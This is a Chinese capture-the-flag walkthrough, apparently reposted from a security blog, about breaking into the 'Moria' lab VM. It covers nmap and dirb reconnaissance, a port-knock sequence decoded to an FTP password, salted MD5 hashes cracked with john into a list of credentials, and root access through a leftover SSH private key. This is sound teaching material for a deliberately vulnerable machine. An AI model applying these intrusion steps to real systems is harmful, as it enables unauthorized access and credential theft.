Moria靶机详解

admin 2025年3月24日23:15:02评论5 views字数 1819阅读6分3秒阅读模式

一、主机发现

arp-scan -l
Moria靶机详解

靶机ip为192.168.55.147

二、端口扫描、目录枚举、漏洞扫描、指纹识别

2.1端口扫描

nmap --min-rate 10000 -p- 192.168.55.147
Moria靶机详解

发现存在21这一特殊端口,开放了ftp服务

UDP端口扫描

nmap -sU --min-rate 10000 -p- 192.168.55.147
Moria靶机详解

靶机没有开放UDP端口

2.2目录枚举

dirb http://192.168.55.147
Moria靶机详解

找到http://192.168.55.147/w/可疑路径

2.3漏洞扫描

nmap --script=vuln -p22,80,6667 192.168.55.147
Moria靶机详解

该网站没有常见漏洞

2.4指纹识别

nmap 192.168.55.147 -sV -sC -O --version-all
Moria靶机详解

发现ftp服务没有匿名登陆方式

三、进入靶机网站寻找信息,拿到低权限账号密码

3.1进入ftp服务

进入靶机网站,发现是一张图片

Moria靶机详解

看不太懂这种图片,访问http://192.168.55.147/w/路径查看信息

Moria靶机详解

这个路径下一直点击,最后一个文件夹反复退出进入,发现内容不一样

检查源代码发现只有一句话,url也没有跳转,说明页面存在文本文件或者静态页面能够去调用

尝试寻找该文件

dirb http://192.168.55.147/w/h/i/s/p/e/r/the_abyss/  -X .txt .img .html
Moria靶机详解

成功找到该文件

进入文件之后发现也只有文本,没有其它信息

Moria靶机详解

将这些名字收集作为ftp的账号,发现都需要密码,且找不到密码

看到文本中的knock,想到有没有可能是端口敲门,然后开放一个新端口存在漏洞

在http://192.168.55.147/w/h/i/s/p/e/r/the_abyss/random.txt页面刷新,然后使用wireshark抓包查看信息

Moria靶机详解

尝试以77,101,108,111,110,54,57顺序敲击端口

knock -v 192.168.55.147 77 101 108 108 111 110 54 57
nmap --min-rate 10000 -p- 192.168.55.147  
Moria靶机详解

发现没有开放新端口

猜测这些数字是ASCII码

77 101 108 108 111 110 54 57分别对应M e l l o n 6 9

Mellon在第一张图上有所提现

尝试进入ftp服务

账号提示了,密码使用Mellon69

Moria靶机详解

成功进入

3.2拿到低权限用户账号密码

发现/var/www/html目录下存在一个新目录,尝试访问

Moria靶机详解

发现了账号和密码

Moria靶机详解

尝试爆破

3.2.1在在线网站上进行爆破

在线网站:

MD5免费在线解密破解_MD5在线加密-SOMD5

Moria靶机详解

3.2.2使用john工具进行爆破

查看网页源代码,发现md5加盐了

Moria靶机详解

将密码和盐值提取出来一一对应,放到passwd.txt文件中

c2d8960157fc8540f6d5d66594e165e0$6MAp84
727a279d913fba677c490102b135e51e$bQkChe
8c3c3152a5c64ffb683d78efc3520114$HnqeN4
6ba94d6322f53f30aca4f34960203703$e5ad5s
c789ec9fae1cd07adfc02930a39486a1$g9Wxv7
fec21f5c7dcf8e5e54537cfda92df5fe$HCCsxP
6a113db1fd25c5501ec3a5936d817c29$cC5nTr
7db5040c351237e8332bfbba757a1019$h8spZR
dd272382909a4f51163c77da6356cc6f$tb9AWe

使用john进行爆破

john -form=dynamic_6 passwd.txt 
Moria靶机详解

得到的密码:

Balin:flower
Oin:rainbow
Ori:spanky
Maeglin:fuckoff
Fundin:hunter2
Nain:warrior
Dain:abcdef
Thrain:darkness
Telchar:magic

尝试ssh登陆

使用Ori:spanky即可成功登陆

Moria靶机详解

四、ssh本地私钥提权

发现该用户目录下有一首诗

Moria靶机详解

没啥信息,但是该目录下还有.ssh文件

Moria靶机详解

发现了私钥

还本地登陆过,应该是root用户

Moria靶机详解

直接私钥登陆

ssh [email protected] -i id_rsa
Moria靶机详解

成功提权!

原文始发于微信公众号(泷羽Sec-pp502的安全笔记):Moria靶机详解

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月24日23:15:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Moria靶机详解https://cn-sec.com/archives/3874668.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息